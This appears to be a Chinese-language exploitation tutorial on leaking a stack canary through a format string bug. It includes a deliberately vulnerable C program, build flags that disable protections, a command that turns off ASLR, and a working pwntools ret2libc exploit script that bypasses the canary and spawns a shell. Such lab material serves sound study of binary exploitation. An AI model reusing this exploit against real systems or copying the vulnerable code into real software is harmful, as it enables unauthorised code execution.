Canary机制及绕过策略-格式化字符串漏洞泄露Canary

Canary主要用于防护栈溢出攻击。我们知道,在32位系统上,对于栈溢出漏洞,攻击者通常是通过溢出栈缓冲区,覆盖栈上保存的函数返回地址来达到劫持程序执行流的目的。
Stack canary保护机制在刚进入函数时,在栈上放置一个标志canary,然后 在函数结束时,判断该标志是否被改变,如果被改变,则表示有攻击行为发生。

gcc相关参数及意义

-fstack-protector:启用堆栈保护,不过只为局部变量中含有 char 数组的函数插入保护代码
-fstack-protector-all:启用堆栈保护,为所有函数插入保护代码。
-fno-stack-protector:禁用堆栈保护

一,实验源码

文件名:Canary.c

#include 
#include 

void vul(char *msg_orig)
{
    char msg[128];
    memcpy(msg,msg_orig,128);
    printf(msg);

    char shellcode[64];
    puts("Now ,plz give me your shellcode:");
    read(0,shellcode,256);

}


int main()
{
    puts("So plz leave your message:");
    char msg[128];
    memset(msg,0,128);
    read(0,msg,128);
    vul(msg);
    puts("Bye!");
    return 0;

}
Canary机制及绕过策略-格式化字符串漏洞泄露Canary_第1张图片

二,编译

命令:gcc -m32 -ggdb -z execstack -fstack-protector -no-pie -o pwnme Cannary.c

Canary机制及绕过策略-格式化字符串漏洞泄露Canary_第2张图片

使用ldd pwnme,查看libc文件的加载位置是否会变

Canary机制及绕过策略-格式化字符串漏洞泄露Canary_第3张图片

如果会改变,为了调试方便,可以使用:echo 0 > /proc/sys/kernel/randomize_va_space,关闭整个系统的地址随机化保护。

运行测试下

Canary机制及绕过策略-格式化字符串漏洞泄露Canary_第4张图片

ok!!!

三,调试

gdb调试:


Canary机制及绕过策略-格式化字符串漏洞泄露Canary_第5张图片
Canary机制及绕过策略-格式化字符串漏洞泄露Canary_第6张图片

vul函数返回前

Canary机制及绕过策略-格式化字符串漏洞泄露Canary_第7张图片

我们简单了解了下canary机制,接下来尝试利用格式化字符串漏洞泄露canary的值

泄露Canary

其实canary的值在程序每一次运行都是会改变的

我们在xor下一个断点,测试一下。

Canary机制及绕过策略-格式化字符串漏洞泄露Canary_第8张图片

重新运行

Canary机制及绕过策略-格式化字符串漏洞泄露Canary_第9张图片

所以说canary的值具有不可预测性
但是,eax的值来源于gs:0x14,而gs:0x14存在于栈空间上,所以我们只要找到它栈空间上的位置,就可以泄露它的值。接下来我们就利用格式化字符串漏洞泄露Canary

首先在格式化漏洞点printf函数下好断点

Canary机制及绕过策略-格式化字符串漏洞泄露Canary_第10张图片

运行,输入:AAAAAAAAAA

然后查看栈空间内容,esp = 0xffffd0c0,指向字符串起始位置 = 0xffffd12c

Canary机制及绕过策略-格式化字符串漏洞泄露Canary_第11张图片

由此可知格式化字符串偏移为 = (0xffffd12c - 0xffffd0c0) / 4 = 27

Canary机制及绕过策略-格式化字符串漏洞泄露Canary_第12张图片

然后我们在检测处下断点,查看看Canary的值 = 0xd7203900

Canary机制及绕过策略-格式化字符串漏洞泄露Canary_第13张图片

这时候我们看上一张图,然后你会有一个地方的值是相同的,而这个位址就是canary

Canary机制及绕过策略-格式化字符串漏洞泄露Canary_第14张图片

同理得到Canary的偏移 = 59,也就是说,在程序调用vulprintf时,输入%59$x'打印出来的就是canary的值。

四,代码

文件名:exp.py
其中涉及到ret2libc,可以先查看https://www.jianshu.com/p/c90530c910b0,再看代码。
因为只是开启Canary,所以解题方法挺多,泄露处Canary就算经典栈溢出也可以。

from pwn import *

p = process('./pwnme')

elf = ELF('/lib32/libc.so.6')                                     #加载的libc文件
libc_base = 0xf7dd1000                                            #libc基址
system_addr =  libc_base + elf.symbols['system']            #system函数地址
bin_sh_addr =  libc_base + next(elf.search('/bin/sh'))      #'/bin/sh'地址

buf = '%59$x'                                                  #构建泄露Canary的格式化字符串
p.recvuntil("message:\n")
p.sendline(buf)                                                  #发送

ret_msg = p.recvuntil('\n')
canary = int(ret_msg,16)                                        #接收到返回的Cannary的值                

p.recvuntil('shellcode:')                                        #利用栈溢出漏洞
buf = 192 * 'A'                                                  #构建buf
buf += p32(canary)                                          #在Canary地址覆盖Canary原本的值,不改变Canary的值从而绕过检查
buf += 28 * 'B'
buf += p32(system_addr)
buf += p32(0xdeadbeef)
buf += p32(bin_sh_addr)

p.sendline(buf)                                                      #发送

p.interactive()

五,测试

Canary机制及绕过策略-格式化字符串漏洞泄露Canary_第15张图片

输入whoami,返回当前用户为root,未报错,得到可产生交互的shell,实验完成!

你可能感兴趣的:(Canary机制及绕过策略-格式化字符串漏洞泄露Canary)